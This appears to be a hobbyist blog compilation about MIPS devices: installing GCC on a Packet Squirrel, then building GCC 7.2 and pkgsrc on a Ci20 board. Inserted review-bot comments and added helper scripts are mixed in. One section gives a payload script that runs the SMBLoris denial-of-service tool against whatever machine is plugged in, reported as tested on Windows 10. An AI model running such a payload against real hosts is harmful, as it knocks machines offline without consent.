 import types # from /usr/lib/python2.7/types.py
 import UserDict # from /usr/lib/python2.7/UserDict.py
 import _abcoll # from /usr/lib/python2.7/_abcoll.py
 import abc # from /usr/lib/python2.7/abc.py
 import _weakrefset # from /usr/lib/python2.7/_weakrefset.py
 import _weakref # builtin
 import copy_reg # from /usr/lib/python2.7/copy_reg.py
 import traceback # from /usr/lib/python2.7/traceback.py
 import sysconfig # from /usr/lib/python2.7/sysconfig.py
 import re # from /usr/lib/python2.7/re.py
 import sre_compile # from /usr/lib/python2.7/sre_compile.py
 import _sre # builtin
 import sre_parse # from /usr/lib/python2.7/sre_parse.py
 import sre_constants # from /usr/lib/python2.7/sre_constants.py
 dlopen("/usr/lib/python2.7/lib-dynload/_locale.so", 2);
 import _locale # dynamically loaded from /usr/lib/python2.7/lib-dynload/_locale.so
 import _sysconfigdata # from /usr/lib/python2.7/_sysconfigdata.py
 import encodings # directory /usr/lib/python2.7/encodings
 import encodings # from /usr/lib/python2.7/encodings/__init__.py
 import codecs # from /usr/lib/python2.7/codecs.py
 import _codecs # builtin
 import encodings.aliases # from /usr/lib/python2.7/encodings/aliases.py
 import encodings.ascii # from /usr/lib/python2.7/encodings/ascii.py
 Python 2.7.12 (default, Jun 28 2017, 19:07:03)
 [GCC 4.8.3] on linux2
 Type "help", "copyright", "credits" or "license" for more information

Next I will configure some test PAYLOADS on the Packet Squirrel; hopefully I will be able to post my next findings soon.

P.S. I need to get an emulated MIPS system and install GCC on it to build some tools that might be of use for the next exploits with the Packet Squirrel.

According to the QEMU LinuxMIPS WIKI the CPU on the Packet Squirrel is compatible with QEMU, and since the Packet Squirrel is based on OpenWRT it looks like it should work.

OpenWrt in QEMU MIPS

Note: Use QEMU >= 2.2 (earlier versions can have bugs with MIPS16, see ticket 16881). Ubuntu 14.03.x LTS uses qemu 2.0, which has this bug.

The “malta” platform is meant for use with QEMU for emulating a MIPS system.

The malta target supports both big and little-endian variants, pick the matching files and qemu version (qemu-system-mips, or qemu-system-mipsel).

qemu-system-mipsel -kernel openwrt-malta-le-vmlinux-initramfs.elf -nographic -m 256

In recent enough versions one can enable ext4 root filesystem image building, and since r46269 (note: only in trunk, it’s not part of the 15.05 CC release) it’s possible to boot straight from that image (without an initramfs):

qemu-system-mipsel -M malta \
-hda openwrt-malta-le-root.ext4 \
-kernel openwrt-malta-le-vmlinux.elf \
-nographic -append "root=/dev/sda console=ttyS0"

Packet Squirrel GCC and SMBLoris


Since the hardware footprint of the Packet Squirrel is so limited (2 MB for the root filesystem / and 30 MB of tmpfs on /tmp), I decided to find a way to get the GCC compiler and the needed libraries onto the Packet Squirrel without the native opkg package manager.

I have attached an 8 GB USB flash drive to the Packet Squirrel and formatted it from there as EXT4 /dev/sda1 partition

Disk /dev/sda: 7807 MB, 7807401984 bytes
250 heads, 5 sectors/track, 12199 cylinders
Units = cylinders of 1250 * 512 = 640000 bytes

Device Boot Start End Blocks Id System
/dev/sda1 1 12199 7624372+ 83 Linux

/dev/sda1 gets automounted on /mnt upon boot, so we can use this extra space for GCC and the other dependencies.

Since I did not want to go through cross-compilation on my x86_64 Linux machine to get the MIPS binaries, I downloaded the precompiled packages from OpenWRT to my x86_64 Linux laptop

https://downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/

The following packages are needed to get C code to compile natively on the Packet Squirrel

wget https://downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/libbfd_2.24-3_ar71xx.ipk
wget https://downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/libopcodes_2.24-3_ar71xx.ipk
wget https://downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/objdump_2.24-3_ar71xx.ipk
wget https://downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/binutils_2.24-3_ar71xx.ipk
wget https://downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/packages/gcc_4.8.3-1_ar71xx.ipk

Once the packages are downloaded, upload them via scp to the /mnt partition on the Packet Squirrel

scp *.ipk root@172.16.32.1:/mnt/

Login to the Packet Squirrel via ssh

ssh root@172.16.32.1 
root@squirrel:~# mkdir /mnt/tt 
root@squirrel:~# mv /mnt/*.ipk /mnt/tt
root@squirrel:~#

And here is what I did with each ipk package separately in /mnt/tt.
The steps below are pretty self-explanatory, since the ipk is really a gzipped tarball
containing other tarballs.

root@squirrel:/mnt/tt# mv libbfd_2.24-3_ar71xx.ipk libbfd_2.24-3_ar71xx.tar.gz
root@squirrel:/mnt/tt# rm -rf b2/
root@squirrel:/mnt/tt# gunzip libbfd_2.24-3_ar71xx.tar.gz 
root@squirrel:/mnt/tt# tar -xvf libbfd_2.24-3_ar71xx.tar 
./debian-binary
./data.tar.gz
./control.tar.gz

We are only interested in the data.tar.gz which contains the compiled binaries
and libraries, so we create a directory called libbfd and move the
data.tar.gz there for extraction

root@squirrel:/mnt/tt# rm debian-binary 
root@squirrel:/mnt/tt# rm control.tar.gz 
root@squirrel:/mnt/tt# rm libbfd_2.24-3_ar71xx.tar 
root@squirrel:/mnt/tt# mkdir libbfd
root@squirrel:/mnt/tt# mv data.tar.gz libbfd/
root@squirrel:/mnt/tt# cd libbfd/
root@squirrel:/mnt/tt/libbfd# ls
data.tar.gz
root@squirrel:/mnt/tt/libbfd# tar -zxvf data.tar.gz 
./
./usr/
./usr/lib/
./usr/lib/libbfd-2.24.so
./usr/lib/libbfd.s
root@squirrel:/mnt/tt/libbfd# ls -la
drwxr-xr-x 3 root root 4096 Jul 14 02:11 .
drwxr-xr-x 7 root root 4096 Jul 14 02:10 ..
-rw-r--r-- 1 107 111 393581 Jan 31 2016 data.tar.gz
drwxr-xr-x 3 root root 4096 Jul 14 02:11 usr
root@squirrel:/mnt/tt/libbfd# rm data.tar.gz 
root@squirrel:/mnt/tt/libbfd# cd usr/
root@squirrel:/mnt/tt/libbfd/usr# cd lib/
root@squirrel:/mnt/tt/libbfd/usr/lib# ls -al
drwxr-xr-x 2 root root 4096 Jul 14 02:11 .
drwxr-xr-x 3 root root 4096 Jul 14 02:11 ..
-rwxr-xr-x 1 root root 935260 Jan 31 2016 libbfd-2.24.so
lrwxrwxrwx 1 root root 14 Jul 14 02:11 libbfd.so -> libbfd-2.24.so

Next we need to create symlinks from the / root filesystem to the extracted binaries
and libraries on the /mnt USB Flash partition

root@squirrel:/mnt/tt/libbfd/usr/lib# pwd
/mnt/tt/libbfd/usr/lib
root@squirrel:/mnt/tt/libbfd/usr/lib# ln -s /mnt/tt/libbfd/usr/lib/libbfd-2.24.so /usr/lib/libbfd-2.24.so
root@squirrel:/mnt/tt/libbfd/usr/lib# ln -s /mnt/tt/libbfd/usr/lib/libbfd-2.24.so /usr/lib/libbfd.so

We repeat the same process for the following packages

binutils_2.24-3_ar71xx.ipk
objdump_2.24-3_ar71xx.ipk
libopcodes_2.24-3_ar71xx.ipk
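
As an added example (not code from the original post), here is a small POSIX sh script that automates the unpacking and symlinking done by hand above, for any number of ipk packages; the paths and the demo package it builds are assumptions for the demo, and the link step deliberately refuses to overwrite files already present on the device.

```shell
#!/bin/sh
# Added example, not code from the original post: automate the manual steps
# above. An OpenWrt-style .ipk is a gzipped tar holding debian-binary,
# control.tar.gz and data.tar.gz; only data.tar.gz carries the files.
# link_tree then symlinks every file into a root prefix, as the post does with
# ln -s, but refuses to overwrite anything already there so a stock library on
# the device is never silently replaced. Paths here are demo assumptions; on the
# Squirrel they would be /mnt/tt and /.
set -eu

# extract_ipk IPK DESTDIR: unpack the package's data tree under DESTDIR.
extract_ipk() {
    ipk=$1; dest=$2
    tmp=$(mktemp -d)
    mkdir -p "$dest"
    tar -xzf "$ipk" -C "$tmp"               # outer archive: plain gzipped tarball
    tar -xzf "$tmp/data.tar.gz" -C "$dest"  # inner archive: the actual payload
    rm -rf "$tmp"
}

# link_tree SRCROOT DESTROOT: for each file or symlink under SRCROOT create
# DESTROOT/<relative path> -> SRCROOT/<relative path>; existing entries are kept.
link_tree() {
    src=$(cd "$1" && pwd)   # absolute, so the links stay valid from any cwd
    root=$2
    find "$src" \( -type f -o -type l \) | while read -r path; do
        rel=${path#"$src"/}
        target=$root/$rel
        mkdir -p "$(dirname "$target")"
        if [ -e "$target" ] || [ -L "$target" ]; then
            echo "skip: $target already exists" >&2
            continue
        fi
        ln -s "$path" "$target"
    done
}

# make_demo_ipk OUT: build a constructed .ipk mimicking the libbfd layout
# (usr/lib/libdemo-1.0.so plus a libdemo.so symlink); demo data, not a real package.
make_demo_ipk() {
    out=$(cd "$(dirname "$1")" && pwd)/$(basename "$1")
    work=$(mktemp -d)
    mkdir -p "$work/data/usr/lib"
    printf 'not a real shared object\n' > "$work/data/usr/lib/libdemo-1.0.so"
    ln -s libdemo-1.0.so "$work/data/usr/lib/libdemo.so"
    printf '2.0\n' > "$work/debian-binary"
    (cd "$work/data" && tar -czf ../data.tar.gz .)
    (cd "$work" && tar -czf control.tar.gz debian-binary)   # stand-in control archive
    (cd "$work" && tar -czf "$out" ./debian-binary ./control.tar.gz ./data.tar.gz)
    rm -rf "$work"
}

# Demo run: "sh ipktool.sh demo" unpacks into ./tt/libdemo and links into ./root
if [ "${1:-}" = demo ]; then
    make_demo_ipk ./libdemo_1.0_ar71xx.ipk
    extract_ipk ./libdemo_1.0_ar71xx.ipk ./tt/libdemo
    link_tree ./tt/libdemo "$(pwd)/root"
    ls -l root/usr/lib
fi
```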

Once we are done with these we can finally move on to the extraction of GCC ipk package

root@squirrel:/mnt/tt/gcc/usr# ls -al
drwxr-xr-x 5 root root 4096 Jul 14 02:06 .
drwxr-xr-x 3 root root 4096 Jul 14 02:39 ..
drwxr-xr-x 2 root root 4096 Jul 14 02:06 bin
drwxr-xr-x 3 root root 4096 Jul 14 02:06 include
drwxr-xr-x 3 root root 4096 Jul 14 02:06 lib

root@squirrel:/mnt/tt/gcc/usr/include# ls -al 
drwxr-xr-x 3 root root 4096 Jul 14 02:06 .
drwxr-xr-x 5 root root 4096 Jul 14 02:06 ..
drwxr-xr-x 3 root root 4096 Jul 14 02:06 c++

So we create a directory symlink pointing at /mnt/tt/gcc/usr/include
from /usr on the root filesystem of the Packet Squirrel, like so

root@squirrel:/mnt/tt/gcc/usr/include# ls -la include
lrwxrwxrwx 1 root root 25 Jul 14 02:11 include -> /mnt/tt/gcc/usr/include/

Next we do the same for the /mnt/tt/gcc/usr/lib/gcc directory

root@squirrel:/mnt/tt/gcc/usr/lib# ls -al
drwxr-xr-x 3 root root 4096 Jul 14 02:06 .
drwxr-xr-x 5 root root 4096 Jul 14 02:06 ..
drwxr-xr-x 3 root root 4096 Jul 14 02:06 gcc

root@squirrel:/usr/lib# ls -la gcc
lrwxrwxrwx 1 root root 25 Jul 14 02:11 gcc -> /disk/tt/gcc/usr/lib/gcc/

By now you should have a fully working GCC compiler on the Packet Squirrel; you can try to compile and run some code (SMBLoris.c for example) that you scp to the device

root@squirrel:/mnt/tt/gcc/usr/bin# ./gcc -v
Using built-in specs.
COLLECT_GCC=./gcc
COLLECT_LTO_WRAPPER=/mnt/tt/gcc/usr/bin/../lib/gcc/mips-openwrt-linux-uclibc/4.8.3/lto-wrapper
Target: mips-openwrt-linux-uclibc
Configured with: /home/buildbot/slave-local/ar71xx_generic/build/build_dir/target-mips_34kc_uClibc-0.9.33.2/gcc-4.8.3/configure --target=mips-openwrt-linux --host=mips-openwrt-linux --build=x86_64-linux-gnu --program-prefix= --program-suffix= --prefix=/usr --exec-prefix=/usr --bindir=/usr/bin --sbindir=/usr/sbin --libexecdir=/usr/lib --sysconfdir=/etc --datadir=/usr/share --localstatedir=/var --mandir=/usr/man --infodir=/usr/info --disable-nls --build=x86_64-linux-gnu --host=mips-openwrt-linux-uclibc --target=mips-openwrt-linux-uclibc --enable-languages=c,c++ --with-bugurl=https://dev.openwrt.org/ --with-pkgversion='OpenWrt GCC 4.8.3' --enable-shared --disable-__cxa_atexit --enable-target-optspace --with-gnu-ld --disable-nls --disable-libmudflap --disable-multilib --disable-libgomp --disable-libquadmath --disable-libssp --disable-decimal-float --disable-libstdcxx-pch --with-host-libstdcxx=-lstdc++ --prefix=/usr --libexecdir=/usr/lib --with-float=soft
Thread model: posix
gcc version 4.8.3 (OpenWrt GCC 4.8.3)
root@squirrel:/mnt/tt/gcc/usr/bin# ./gcc /mnt/smbloris.c -o /mnt/smbloris

The smbloris.c is taken from Hector Martin's (marcan) GitHub gist here https://gist.github.com/marcan/6a2d14b0e3eaa5de1795a763fb58641e#file-smbloris-c

The following Packet Squirrel payload script can be used to launch the SMBLoris attack from this device onto the local network it is connected to; assign it to switch 1/2/3

# Show SETUP LED 
LED SETUP 
# Set the network mode to NAT 
NETMODE NAT 
sleep 5

# You may want to increase your local conntrack limit
echo 1200000 > /proc/sys/net/netfilter/nf_conntrack_max

# Get the IP address for the connected target machine 
ip="$(cat /var/dhcp.leases | awk '{print $3}')"

# Execute smbloris against the target IP 
/mnt/smbloris eth0 1.1.1.1 255.255.255.254 $ip &

I have tested this against the latest Windows 10 64-bit, version 10.0.16299.19, on physical hardware: the CPU goes to 100 % and memory usage jumps high, as you can see in the video below

I'm sure there are other tools that could be used in a similar manner (exploit code written in C, for example, compiled on the Packet Squirrel... the possibilities are endless)

Nevertheless this was a fun exercise

Pkgsrc on Ci20 Creator (v2) board

The Ci20 is a great little board that I got recently because I wanted to experiment with a new architecture (MIPS). Quick specifications:

SoC: Ingenic JZ4780
CPU: Dual 1.2 GHz XBurst MIPS32, little endian
Caches: 32 KB instruction + 32 KB data per core, 512 KB shared L2
RAM: 1 GB DDR3
NAND: 8 GB

More detailed information is here https://elinux.org/CI20_Hardware  and here https://elinux.org/MIPS_Creator_CI20

The board comes with Debian Linux mips 7.5 preinstalled and a custom kernel:

Linux mipsbox 3.0.8-00847-g2e5af7d #1 SMP PREEMPT Wed Jun 24 10:10:52 BST 2015 mips GNU/Linux

There are possibilities to flash the NAND storage with newer images available from here https://elinux.org/CI20_Distros but I wanted to keep the stock kernel because of the custom drivers for the GPU that support mplayer hw-playback.

Before getting to work with pkgsrc on Linux I wanted to build a newer GCC compiler natively (the stock image comes with GCC 4.6.3), so I decided to give 7.2.0 a try and build it on the board itself.

Please note that I used --program-suffix=-4.6 and /usr/include/c++/4.6 in the configure line. This is not correct but a dirty hack to overwrite the current GCC 4.6 files in Debian (it is a nightmare to remove the GCC-related packages as they have many dependencies). It works quite well :)

Download GCC to the Ci20
# wget https://ftp.gnu.org/gnu/gcc/gcc-7.2.0/gcc-7.2.0.tar.gz
# tar -zxvf gcc-7.2.0.tar.gz
# ./configure -v --enable-languages=c,c++,objc,obj-c++ --prefix=/usr \
   --program-suffix=-4.6 --enable-shared --enable-linker-build-id \
   --with-system-zlib --libexecdir=/usr/lib --without-included-gettext \
   --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.6 \
   --libdir=/usr/lib --enable-nls --with-sysroot=/ \
   --enable-clocale=gnu --enable-libstdcxx-debug \
   --enable-libstdcxx-time=yes --enable-gnu-unique-object \
   --enable-plugin --with-mips-plt --with-arch-32=mips2 \
   --with-tune-32=mips32 --enable-targets=all --with-arch-64=mips3 \
   --with-tune-64=mips64 --enable-checking=release \
   --build=mipsel-linux-gnu --host=mipsel-linux-gnu \
   --target=mipsel-linux-gnu

It took approximately 30 hours to build on my Ci20, so be patient (it may also be
a good idea to create some swap in case you run out of memory; I did mine
on a USB drive)

# mount /dev/sda1 /mnt/usb
# dd if=/dev/zero of=/mnt/usb/swapfile bs=1M count=102
# chmod 600 /mnt/usb/swapfile 
# mkswap /mnt/usb/swapfile
# swapon /mnt/usb/swapfile 

Finally build GCC 

# make
# make install

Once we have the GCC 7.2 installed it will be in the old GCC 4.6 directory structure, but it does not matter

root@mipsbox:/usr/include/c++/4.6# gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/mipsel-linux-gnu/7.2.0/lto-wrapper
Target: mipsel-linux-gnu
Configured with: ./configure -v --enable-languages=c,c++,objc,obj-c++ --prefix=/usr --program-suffix=-4.6 --enable-shared --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.6 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --enable-plugin --with-mips-plt --with-arch-32=mips2 --with-tune-32=mips32 --enable-targets=all --with-arch-64=mips3 --with-tune-64=mips64 --enable-checking=release --build=mipsel-linux-gnu --host=mipsel-linux-gnu --target=mipsel-linux-gnu
Thread model: posix
gcc version 7.2.0 (GCC)

Now let's go and bootstrap pkgsrc on the Ci20! I decided to keep the pkgsrc sources on a separate USB flash drive and /usr/pkg on the NAND flash.

root@mipsbox:/disk# ftp ftp.netbsd.org
Connected to ftp.netbsd.org.
220 ftp.NetBSD.org FTP server (NetBSD-ftpd 20110904) ready.
Name (ftp.netbsd.org:root): ftp
331 Guest login ok, type your name as password.
Password:
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pas
Passive mode on.
ftp> cd pub
250 CWD command successful.
ftp> cd pkgsrc
250-
 Please read the file README
 it was last modified on Tue Nov 18 09:53:20 2008 - 3299 days ago
250 CWD command successful.
ftp> cd pkgsrc-2017Q3
250 CWD command successful.
ftp> get pkgsrc.tar.gz

Once it is downloaded, extract it on the USB drive and set symlinks

# pwd 
/mnt/usb
# tar -zxvf pkgsrc.tar.gz
# ln -s /mnt/usb/pkgsrc /usr/pkgsrc

and move on to the bootstrapping; also read the following: https://wiki.netbsd.org/pkgsrc/how_to_use_pkgsrc_on_linux/

# echo "export SH=/bin/bash" >> /root/.bashrc

Log in again as root and continue the bootstrap. The current bootstrap script does not understand the endianness of MIPS platforms and thus fails to produce the correct arch type, mipseb or mipsel (the Ci20 is mipsel).

I have produced a patched bootstrap that works for the Ci20:

*** patched-bootstrap 2017-12-03 22:06:12.960991623 +0100
--- bootstrap 2017-10-23 03:00:23.000000000 +0200
***************
*** 1,6 ****
 #! /bin/sh
 
! # $NetBSD: bootstrap,v 1.243.4.1 2017/10/31 15:53:48 spz Exp $
 #
 # Copyright (c) 2001-2011 Alistair Crooks <agc@NetBSD.org>
 # All rights reserved.
--- 1,6 ----
 #! /bin/sh
 
! # $NetBSD: bootstrap,v 1.244 2017/10/22 19:29:20 bsiegert Exp $
 #
 # Copyright (c) 2001-2011 Alistair Crooks <agc@NetBSD.org>
 # All rights reserved.
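Review bot: the header order (`*** patched-bootstrap` as the first file and `--- bootstrap` as the second) makes this a reverse diff: the `*`/old side is the modified copy and the `-`/new side is the pristine script, so applying it to the stock bootstrap with `patch` would need `-R`; regenerate it as `diff -c bootstrap patched-bootstrap` so it applies forward. The only change in this hunk is the `$NetBSD` id line (1.243.4.1 versus 1.244), which shows the two copies come from different upstream revisions; diffing against the same base would drop this noise hunk.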
***************
*** 691,697 ****
 need_awk=yes
 need_sed=yes
 set_opsys=yes
! machine_arch=mipsel
 check_compiler=yes
 if [ `uname -r` -lt 6 ]; then
 # IRIX 5's mkdir bails out with an error when trying to create with the -p
--- 691,697 ----
 need_awk=yes
 need_sed=yes
 set_opsys=yes
! machine_arch=mipseb
 check_compiler=yes
 if [ `uname -r` -lt 6 ]; then
 # IRIX 5's mkdir bails out with an error when trying to create with the -p
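Review bot: the `mipseb` to `mipsel` change in this hunk sits in a block that, going by the `uname -r -lt 6` test and the IRIX 5 mkdir comment in the context lines, is the IRIX branch of the OS case; it never runs on the Ci20's Linux, and IRIX hardware is big-endian, so the hunk is unnecessary here and wrong there. Drop it.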
***************
*** 720,727 ****
 case "$machine_arch" in
 i?86) machine_arch=i386 ;;
 ppc64le) machine_arch=powerpc64le ;;
! mips) machine_arch=mipsel 
! esac
 ;;
 Minix)
 root_group=operator
--- 720,726 ----
 case "$machine_arch" in
 i?86) machine_arch=i386 ;;
 ppc64le) machine_arch=powerpc64le ;;
! esac
 ;;
 Minix)
 root_group=operator
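Review bot: the added `mips) machine_arch=mipsel` item lacks a terminating `;;`; it only parses because it is the last item before `esac` (which is why `esac` also shows up as changed). Write it as `mips) machine_arch=mipsel ;;` to match the `i?86)` and `ppc64le)` items. It also hard-codes little-endian rather than detecting it: on Linux `uname -m` reports `mips` for both byte orders, so deriving the value from the compiler target (`gcc -dumpmachine`, which is `mipsel-linux-gnu` per the gcc -v output above) would keep the script correct on big-endian boards as well.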
***************
*** 869,875 ****
 # "i386" can support 64-bit, e.g. SunOS, defaults to 32-bit.
 i386/64) abi=64 machine_arch=x86_64 ;;
 i386/*) abi=32 machine_arch=i386 ;;
- mips/*) abi=32 machine_arch=mipsel ;;
 # XXX: powerpc untested
 powerpc/64) abi=64 machine_arch=powerpc64 ;;
 powerpc/*) abi=32 machine_arch=powerpc ;;
--- 868,873 ----
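Review bot: the added `mips/*) abi=32 machine_arch=mipsel ;;` entry looks dead on the Ci20: the previous hunk already rewrites `machine_arch` from `mips` to `mipsel`, and the neighbouring `i386/64` and `powerpc/*` patterns suggest this case is keyed on `$machine_arch/$abi`, so the key here would be `mipsel/*` and never match `mips/*`. Either key it as `mipsel/*)` (setting only `abi=32`) or drop one of the two hunks; as written it is unclear which one is doing the work.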

After you patch /usr/pkgsrc/bootstrap/bootstrap you can run it, and after about an hour pkgsrc will be bootstrapped successfully on the Ci20 Debian mipsel:

# cd /usr/pkgsrc/bootstrap
# ./bootstrap
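
As an added example (not from the post and not pkgsrc's own code), here is how the bootstrap's machine_arch could be derived instead of hard-coded, using gcc -dumpmachine (a real GCC flag) with a byte-order probe of the running system as fallback; the function names are mine.

```shell
#!/bin/sh
# Added example, not from the post and not pkgsrc's own bootstrap code: work out
# the pkgsrc MACHINE_ARCH for a Linux MIPS host (mipsel or mipseb) instead of
# hard-coding it. On Linux uname -m says just "mips" for both byte orders, so
# the triplet printed by gcc -dumpmachine (mipsel-linux-gnu on the Ci20, per
# the gcc -v output above) is the primary source, with a byte-order probe of
# the running system as fallback. Function names are assumptions of this demo.

# mips_arch_from_triplet TRIPLET: map a GNU target triplet to mipsel/mipseb.
# Prints nothing and returns 1 for non-MIPS or 64-bit targets.
mips_arch_from_triplet() {
    cpu=${1%%-*}                 # "mipsel-linux-gnu" -> "mipsel"
    case $cpu in
        mips64*|mipsisa64*) return 1 ;;   # 64-bit ABIs are out of scope here
        mips*el)            echo mipsel ;;
        mips*)              echo mipseb ;;
        *)                  return 1 ;;
    esac
}

# host_byte_order: print "little" or "big" by letting od interpret the two
# bytes 01 02 as one native 16-bit word (0x0201 little-endian, 0x0102 big).
host_byte_order() {
    word=$(printf '\001\002' | od -An -tx2 | tr -d ' \n')
    case $word in
        0201) echo little ;;
        0102) echo big ;;
        *)    return 1 ;;
    esac
}

# mips_arch_from_byte_order MACHINE ORDER: MACHINE is uname -m output,
# ORDER is little|big; maps to mipsel/mipseb, returns 1 for non-MIPS.
mips_arch_from_byte_order() {
    case $1 in mips*) ;; *) return 1 ;; esac
    case $2 in
        little) echo mipsel ;;
        big)    echo mipseb ;;
        *)      return 1 ;;
    esac
}

# pkgsrc_mips_arch: the value bootstrap should assign to machine_arch on this
# host; honours $CC like bootstrap does, defaulting to gcc.
pkgsrc_mips_arch() {
    cc=${CC:-gcc}
    if triplet=$("$cc" -dumpmachine 2>/dev/null) \
       && arch=$(mips_arch_from_triplet "$triplet"); then
        echo "$arch"
        return 0
    fi
    mips_arch_from_byte_order "$(uname -m)" "$(host_byte_order)"
}

# Demo run: "sh mipsarch.sh detect" prints the arch for the current host
if [ "${1:-}" = detect ]; then
    pkgsrc_mips_arch || echo "not a MIPS host" >&2
fi
```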

To bmake packages afterwards, make sure you have the following directories in your PATH: /usr/pkg/bin and /usr/pkg/sbin

What I found, however, were these minor issues during bmake builds afterwards:

/usr/pkgsrc/devel/readline

root@mipsbox:/usr/pkgsrc/devel/readline# /usr/pkg/bin/bmake 
=> Bootstrap dependency digest>=20010302: found digest-20160304
===> Skipping vulnerability checks.
WARNING: No /usr/pkg/pkgdb/pkg-vulnerabilities file found.
WARNING: To fix run: `/usr/pkg/sbin/pkg_admin -K /usr/pkg/pkgdb fetch-pkg-vulnerabilities'.
=> Checksum SHA1 OK for readline-7.0.tar.gz
=> Checksum RMD160 OK for readline-7.0.tar.gz
=> Checksum SHA512 OK for readline-7.0.tar.gz
===> Installing dependencies for readline-7.0
=> Tool dependency libtool-base>=2.4.2nb9: found libtool-base-2.4.6
=> Tool dependency nbpatch-[0-9]*: found nbpatch-20151107
=> Build dependency cwrappers>=20150314: found cwrappers-20170611
===> Overriding tools for readline-7.0
===> Extracting for readline-7.0
===> Patching for readline-7.0
=> Applying pkgsrc patches for readline-7.0
===> Creating toolchain wrappers for readline-7.0
===> Configuring for readline-7.0
=> Modifying GNU configure scripts to avoid --recheck
=> Replacing config-guess with pkgsrc versions
=> Replacing config-sub with pkgsrc versions
=> Replacing install-sh with pkgsrc version
checking build system type... mipsel-debian-linux-gnu
checking host system type... mipsel-debian-linux-gnu

Beginning configuration for readline-7.0 for mipsel-debian-linux-gnu

checking whether make sets $(MAKE)... yes
checking for mipsel-debian-linux-gcc... /usr/bin/gcc
checking whether the C compiler works... no
configure: error: in `/disk/pkgsrc/devel/readline/work/readline-7.0':
configure: error: C compiler cannot create executables
See `config.log' for more details
*** Error code 77

Stop.
bmake[1]: stopped in /usr/pkgsrc/devel/readline
*** Error code 1

Stop.
bmake: stopped in /usr/pkgsrc/devel/readline

The problem is in the following configure test (let's check config.log):

root@mipsbox:/usr/pkgsrc/devel/readline# less /disk/pkgsrc/devel/readline/work/readline-7.0/config.log
This file contains any messages produced by compilers while
running configure, to aid debugging if configure makes a mistake.

It was created by readline configure 7.0, which was
generated by GNU Autoconf 2.69. Invocation command line was

$ ./configure --prefix=/usr/pkg --build=mipsel-debian-linux --host=mipsel-debian-linux --infodir=/usr/pkg/info --mandir=/usr/pkg/man
<--snip-->
gcc version 7.2.0 (GCC) 
configure:2792: $? = 0
configure:2781: /usr/bin/gcc -V >&5
gcc: error: unrecognized command line option '-V'
gcc: fatal error: no input files
compilation terminated.
configure:2792: $? = 1
configure:2781: /usr/bin/gcc -qversion >&5
gcc: error: unrecognized command line option '-qversion'; did you mean '--version'?
gcc: fatal error: no input files
compilation terminated.
configure:2792: $? = 1
configure:2812: checking whether the C compiler works
configure:2834: /usr/bin/gcc -O2 -D_FORTIFY_SOURCE=2 -Wl,-R/usr/pkg/lib conftest.c >&5
as: Invalid transform rule: l:termcap:
configure:2838: $? = 1
configure:2876: result: no
configure: failed program was:
| /* confdefs.h */
| #define PACKAGE_NAME "readline"
| #define PACKAGE_TARNAME "readline"
| #define PACKAGE_VERSION "7.0"
| #define PACKAGE_STRING "readline 7.0"
| #define PACKAGE_BUGREPORT "bug-readline@gnu.org"
| #define PACKAGE_URL ""
| /* end confdefs.h. */
| 
| int
| main ()
| {
| 
| ;
| return 0;
| }
configure:2881: error: in `/disk/pkgsrc/devel/readline/work/readline-7.0':
configure:2883: error: C compiler cannot create executables
See `config.log' for more details

What worked however was going to the work dir of readline and doing the following

root@mipsbox:# cd /usr/pkgsrc/devel/readline/work/readline-7.0
root@mipsbox:# ./configure --prefix=/usr/pkg 
root@mipsbox:# echo "readline-7.0" > /usr/pkgsrc/devel/readline/work/.configure_done
root@mipsbox:# cd /usr/pkgsrc/devel/readline/work/readline-7.0/
root@mipsbox:# /usr/pkg/bin/bmake 
root@mipsbox:# echo "readline-7.0" > /usr/pkgsrc/devel/readline/work/.build_done
root@mipsbox:# mkdir -p work/.destdir/usr/pkg/info
root@mipsbox:# touch work/.destdir/usr/pkg/info/history.info
root@mipsbox:# touch work/.destdir/usr/pkg/info/readline.info
root@mipsbox:# touch work/.destdir/usr/pkg/info/rluserman.info
root@mipsbox:# touch work/.destdir/usr/pkg/lib/libhistory.la
root@mipsbox:# touch work/.destdir/usr/pkg/lib/libreadline.la
root@mipsbox:# mkdir -p work/.destdir/usr/pkg/man/man3
root@mipsbox:# touch work/.destdir/usr/pkg/man/man3/readline.3
root@mipsbox:# cd /usr/pkgsrc/devel/readline
root@mipsbox:# /usr/pkg/bin/bmake install 

Same approach as above worked for /usr/pkgsrc/lang/python27

root@mipsbox:/usr/pkg/bin# ./python2.7
Python 2.7.14 (default, Dec 3 2017, 18:36:28) 
[GCC 7.2.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>>

Here is the list of packages that I have made so far

drwxr-xr-x 2 root root 728 Dec 3 20:00 bigreqsproto-1.1.2
drwxr-xr-x 2 root root 728 Dec 2 15:07 bmake-20150505
drwxr-xr-x 2 root root 800 Dec 2 15:07 bootstrap-mk-files-20170802
drwxr-xr-x 2 root root 800 Dec 3 22:07 bzip2-1.0.6nb1
drwxr-xr-x 2 root root 656 Dec 2 15:01 cwrappers-20170611
drwxr-xr-x 2 root root 728 Dec 3 19:56 damageproto-1.2.1
drwxr-xr-x 2 root root 800 Dec 3 22:07 db4-4.8.30
drwxr-xr-x 2 root root 728 Dec 2 15:31 digest-20160304
drwxr-xr-x 2 root root 944 Dec 3 21:32 docbook-xml-4.5
drwxr-xr-x 2 root root 872 Dec 3 21:32 docbook-xsl-1.79.1nb2
drwxr-xr-x 2 root root 728 Dec 3 19:48 dri2proto-2.8
drwxr-xr-x 2 root root 728 Dec 3 19:50 dri3proto-1.0
drwxr-xr-x 2 root root 728 Dec 3 19:55 fixesproto-5.0
drwxr-xr-x 2 root root 728 Dec 3 19:52 glproto-1.4.17
drwxr-xr-x 2 root root 728 Dec 3 19:54 inputproto-2.3.2
drwxr-xr-x 2 root root 728 Dec 2 15:35 kbproto-1.0.7
